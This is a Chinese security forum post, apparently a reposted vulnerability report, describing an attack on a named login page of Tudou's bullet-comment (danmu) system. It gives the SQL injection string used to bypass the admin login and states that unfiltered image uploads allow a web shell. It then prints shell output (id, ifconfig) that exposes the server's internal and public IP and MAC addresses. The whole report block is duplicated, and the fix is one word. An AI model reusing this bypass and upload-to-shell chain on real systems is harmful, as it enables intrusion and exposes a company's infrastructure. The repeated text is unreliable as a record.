设为首页收藏本站
开启辅助访问

Moke|墨客

 找回密码
 立即注册
搜索
Moke|墨客»论坛 会员互动区 公开数据 土豆某系统SQL注入到Getshell
返回列表 发新帖
查看: 8795|回复: 0

土豆某系统SQL注入到Getshell

[复制链接]
pasckr

3636

主题

0

回帖

3681

积分

超级版主

Rank: 8Rank: 8

积分
3681
发表于 2016-5-12 17:54:40 | 显示全部楼层 |阅读模式





      rt
  http://xianchang03.danmu.tudou.com/login.do
  土豆弹幕系统 之前报过弱口令 其实登录有个注入
  admin' or '1'='1 直接bypass登录  


  可以控制弹幕 不说
  后台传图片 无任何过滤 可shell  


/home/app_admin/apache-tomcat/webapps/dmfile/>id
uid=501(app_admin) gid=501(app_admin) groups=501(app_admin)
/home/app_admin/apache-tomcat/webapps/dmfile>ifconfig
eth0      Link encap:Ethernet  HWaddr 00:18:51:1D:52:20   
  inet addr:10.108.19.65  Bcast:10.108.19.255  Mask:255.255.255.0
  inet6 addr: fe80::218:51ff:fe1d:5220/64 Scope:Link
  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
  RX packets:221236474134 errors:0 dropped:0 overruns:0 frame:0
  TX packets:221450227112 errors:0 dropped:0 overruns:0 carrier:0
  collisions:0 txqueuelen:0
  RX bytes:252483004549751 (229.6 TiB)  TX bytes:20605763332642 (18.7 TiB)
eth1      Link encap:Ethernet  HWaddr 00:18:51:59:22:64   
  inet addr:101.227.9.28  Bcast:101.227.9.255  Mask:255.255.255.0
  inet6 addr: fe80::218:51ff:fe59:2264/64 Scope:Link
  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
  RX packets:450103026 errors:0 dropped:0 overruns:0 frame:0
  TX packets:13208323 errors:0 dropped:0 overruns:0 carrier:0
  collisions:0 txqueuelen:0
  RX bytes:27841613550 (25.9 GiB)  TX bytes:8370498080 (7.7 GiB)
lo        Link encap:Local Loopback   
  inet addr:127.0.0.1  Mask:255.0.0.0
  inet6 addr: ::1/128 Scope:Host
  UP LOOPBACK RUNNING  MTU:65536  Metric:1
  RX packets:158360007 errors:0 dropped:0 overruns:0 frame:0
  TX packets:158360007 errors:0 dropped:0 overruns:0 carrier:0
  collisions:0 txqueuelen:0
  RX bytes:32129258181 (29.9 GiB)  TX bytes:32129258181 (29.9 GiB)
内网中
  http://xianchang03.danmu.tudou.com/login.do
  土豆弹幕系统 之前报过弱口令 其实登录有个注入
  admin' or '1'='1 直接bypass登录  


  可以控制弹幕 不说
  后台传图片 无任何过滤 可shell  


/home/app_admin/apache-tomcat/webapps/dmfile/>id
uid=501(app_admin) gid=501(app_admin) groups=501(app_admin)
/home/app_admin/apache-tomcat/webapps/dmfile>ifconfig
eth0      Link encap:Ethernet  HWaddr 00:18:51:1D:52:20   
  inet addr:10.108.19.65  Bcast:10.108.19.255  Mask:255.255.255.0
  inet6 addr: fe80::218:51ff:fe1d:5220/64 Scope:Link
  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
  RX packets:221236474134 errors:0 dropped:0 overruns:0 frame:0
  TX packets:221450227112 errors:0 dropped:0 overruns:0 carrier:0
  collisions:0 txqueuelen:0
  RX bytes:252483004549751 (229.6 TiB)  TX bytes:20605763332642 (18.7 TiB)
eth1      Link encap:Ethernet  HWaddr 00:18:51:59:22:64   
  inet addr:101.227.9.28  Bcast:101.227.9.255  Mask:255.255.255.0
  inet6 addr: fe80::218:51ff:fe59:2264/64 Scope:Link
  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
  RX packets:450103026 errors:0 dropped:0 overruns:0 frame:0
  TX packets:13208323 errors:0 dropped:0 overruns:0 carrier:0
  collisions:0 txqueuelen:0
  RX bytes:27841613550 (25.9 GiB)  TX bytes:8370498080 (7.7 GiB)
lo        Link encap:Local Loopback   
  inet addr:127.0.0.1  Mask:255.0.0.0
  inet6 addr: ::1/128 Scope:Host
  UP LOOPBACK RUNNING  MTU:65536  Metric:1
  RX packets:158360007 errors:0 dropped:0 overruns:0 frame:0
  TX packets:158360007 errors:0 dropped:0 overruns:0 carrier:0
  collisions:0 txqueuelen:0
  RX bytes:32129258181 (29.9 GiB)  TX bytes:32129258181 (29.9 GiB)
内网中
解决方案:  
  修复。
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

 

 

快速回复 返回顶部 返回列表